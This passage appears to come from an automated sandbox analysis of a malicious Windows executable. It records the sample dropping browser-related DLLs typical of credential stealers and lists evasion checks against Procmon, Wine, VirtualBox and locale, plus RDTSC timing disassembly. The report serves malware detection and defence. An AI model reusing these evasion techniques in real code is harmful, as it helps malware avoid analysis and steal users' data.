Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F3F0E0 push 30902B2Ch; mov dword ptr [esp], eax 1_2_00F3F12D
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F3F8D6 push esi; mov dword ptr [esp], esp 1_2_00F3F931
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F3F8D6 push 5108A024h; mov dword ptr [esp], edi 1_2_00F3F961
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F3F8D6 push 53702769h; mov dword ptr [esp], ecx 1_2_00F3FA0F
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00DFB0E7 push esi; mov dword ptr [esp], edi 1_2_00DFB147
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00DFB0E7 push 0D7C2BD7h; mov dword ptr [esp], esi 1_2_00DFB180
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EE88AD push 52B6854Ah; mov dword ptr [esp], edx 1_2_00EE8937
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EE88AD push 68DE900Dh; mov dword ptr [esp], esp 1_2_00EE89C7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00F640A6 push eax; mov dword ptr [esp], edi 1_2_00F640EC
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B0B035 push ecx; ret 1_2_00B0B048
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push 5A5C26BFh; mov dword ptr [esp], eax 1_2_00EBD8DA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push 78029A72h; mov dword ptr [esp], edx 1_2_00EBD8F0
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push 19A5D79Bh; mov dword ptr [esp], edx 1_2_00EBD95B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push eax; mov dword ptr [esp], esi 1_2_00EBD9EA
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push eax; mov dword ptr [esp], 5FBF5F13h 1_2_00EBDA1B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push edi; mov dword ptr [esp], eax 1_2_00EBDA2E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push esi; mov dword ptr [esp], ecx 1_2_00EBDA41
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push eax; mov dword ptr [esp], ebp 1_2_00EBDA5B
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push esi; mov dword ptr [esp], 00000000h 1_2_00EBDAC2
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push ebx; mov dword ptr [esp], 48718576h 1_2_00EBDADF
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push 1620C9F2h; mov dword ptr [esp], edi 1_2_00EBDB35
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push 55AF186Ch; mov dword ptr [esp], edi 1_2_00EBDBA7
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push eax; mov dword ptr [esp], ebp 1_2_00EBDC63
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push ebp; mov dword ptr [esp], ebx 1_2_00EBDC84
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push ecx; mov dword ptr [esp], edi 1_2_00EBDCEE
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push edx; mov dword ptr [esp], ecx 1_2_00EBDD07
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push eax; mov dword ptr [esp], 3FBA1F70h 1_2_00EBDD7E
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push 3D62F7FFh; mov dword ptr [esp], edx 1_2_00EBDD98
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00EBD865 push eax; mov dword ptr [esp], ebp 1_2_00EBDDF8
Source: file.exe Static PE information: section name: xposepnz entropy: 7.953764245926421
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_00B09860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00B09860

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC240B second address: EC241A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 jo 00007F4A4CE02A26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC241A second address: EC242C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 jo 00007F4A4CCE842Eh 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6D3A second address: EC6D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A2Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6D4F second address: EC6D60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F4A4CCE8448h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC6EBA second address: EC6EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9A9D second address: EC9AA3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9AA3 second address: EC9AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F4A4CE02A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9B18 second address: EC9B54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jbe 00007F4A4CCE842Ch 0x00000010 mov esi, dword ptr [ebp+122D1936h] 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D1875h], edx 0x0000001e push EFA1361Fh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9B54 second address: EC9BC1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 add dword ptr [esp], 105ECA61h 0x00000017 and esi, 610ECC21h 0x0000001d push 00000003h 0x0000001f mov dword ptr [ebp+122D1899h], ebx 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007F4A4CE02A28h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000016h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 mov dword ptr [ebp+122D180Eh], edi 0x00000047 push 00000003h 0x00000049 mov edx, dword ptr [ebp+122D387Ch] 0x0000004f call 00007F4A4CE02A29h 0x00000054 push eax 0x00000055 push edx 0x00000056 je 00007F4A4CE02A2Ch 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9BC1 second address: EC9BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9BC5 second address: EC9BD6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F4A4CE02A26h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9BD6 second address: EC9BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9BDC second address: EC9C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F4A4CE02A39h 0x0000000d popad 0x0000000e popad 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jbe 00007F4A4CE02A36h 0x00000019 jmp 00007F4A4CE02A30h 0x0000001e mov eax, dword ptr [eax] 0x00000020 push edi 0x00000021 pushad 0x00000022 jmp 00007F4A4CE02A33h 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f pushad 0x00000030 pushad 0x00000031 jo 00007F4A4CE02A26h 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9C42 second address: EC9C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F4A4CCE842Ch 0x0000000b popad 0x0000000c pop eax 0x0000000d and esi, dword ptr [ebp+122D39D4h] 0x00000013 lea ebx, dword ptr [ebp+1244BA08h] 0x00000019 mov edx, dword ptr [ebp+122D39C0h] 0x0000001f xchg eax, ebx 0x00000020 push esi 0x00000021 jc 00007F4A4CCE843Bh 0x00000027 jmp 00007F4A4CCE8435h 0x0000002c pop esi 0x0000002d push eax 0x0000002e push esi 0x0000002f push eax 0x00000030 push edx 0x00000031 jo 00007F4A4CCE8426h 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9CFE second address: EC9D53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D249Dh], edi 0x00000011 jmp 00007F4A4CE02A34h 0x00000016 push 00000000h 0x00000018 mov dword ptr [ebp+122D2639h], ecx 0x0000001e call 00007F4A4CE02A29h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007F4A4CE02A39h 0x0000002b pushad 0x0000002c popad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9D53 second address: EC9D59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9D59 second address: EC9D71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4A4CE02A2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9D71 second address: EC9DC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F4A4CCE8437h 0x00000013 mov eax, dword ptr [eax] 0x00000015 pushad 0x00000016 jmp 00007F4A4CCE8435h 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jno 00007F4A4CCE8426h 0x00000024 popad 0x00000025 popad 0x00000026 mov dword ptr [esp+04h], eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push ecx 0x0000002d jl 00007F4A4CCE8426h 0x00000033 pop ecx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9DC7 second address: EC9E3A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jc 00007F4A4CE02A26h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d xor edi, dword ptr [ebp+122D3744h] 0x00000013 add dword ptr [ebp+122D1AF6h], edx 0x00000019 push 00000003h 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F4A4CE02A28h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D25D5h], eax 0x0000003b push 00000000h 0x0000003d cld 0x0000003e push 00000003h 0x00000040 mov ch, 89h 0x00000042 jno 00007F4A4CE02A2Ch 0x00000048 call 00007F4A4CE02A29h 0x0000004d push esi 0x0000004e jmp 00007F4A4CE02A31h 0x00000053 pop esi 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9E3A second address: EC9E40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9F23 second address: EC9F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EC9F28 second address: EC9F8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F4A4CCE8426h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F4A4CCE8428h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 jmp 00007F4A4CCE8439h 0x0000002e push 00000000h 0x00000030 mov esi, 54CA9300h 0x00000035 xor ecx, 48A22DD1h 0x0000003b push 7D130CE3h 0x00000040 push eax 0x00000041 push edx 0x00000042 pushad 0x00000043 pushad 0x00000044 popad 0x00000045 pushad 0x00000046 popad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EEA4DF second address: EEA502 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE89EB second address: EE89F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE89F1 second address: EE89F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE89F6 second address: EE8A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CCE8430h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE8A0A second address: EE8A0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE8A0E second address: EE8A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE8A18 second address: EE8A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE8A1C second address: EE8A26 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4A4CCE8426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE8A26 second address: EE8A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F4A4CE02A28h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE8EA4 second address: EE8EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 jng 00007F4A4CCE8448h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jp 00007F4A4CCE8426h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE8FF5 second address: EE9025 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A38h 0x00000009 pop edi 0x0000000a jmp 00007F4A4CE02A33h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9025 second address: EE9056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CCE8439h 0x00000007 push ebx 0x00000008 jmp 00007F4A4CCE8433h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE92D1 second address: EE92DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE92DA second address: EE9301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 pushad 0x00000009 jmp 00007F4A4CCE842Fh 0x0000000e jno 00007F4A4CCE842Ch 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE95D8 second address: EE95E5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE95E5 second address: EE95EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE95EE second address: EE9608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F4A4CE02A2Dh 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE1463 second address: EE1470 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F4A4CCE8426h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE1470 second address: EE1491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F4A4CE02A39h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9C99 second address: EE9CA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9F30 second address: EE9F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A2Bh 0x00000009 pop edx 0x0000000a jnp 00007F4A4CE02A3Ch 0x00000010 jmp 00007F4A4CE02A36h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9F5C second address: EE9F75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4A4CCE8435h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE9F75 second address: EE9F97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4A4CE02A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007F4A4CE02A26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EE145F second address: EE1463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF0226 second address: EF022C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF1B1A second address: EF1B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF1B20 second address: EF1B30 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4A4CE02A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF1B30 second address: EF1B34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF1B34 second address: EF1B3A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF1B3A second address: EF1B4A instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4A4CCE8432h 0x00000008 jns 00007F4A4CCE8426h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF1B4A second address: EF1B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4A4CE02A34h 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF1B59 second address: EF1B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF5370 second address: EF5386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4A4CE02A32h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: EF4ABD second address: EF4AC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
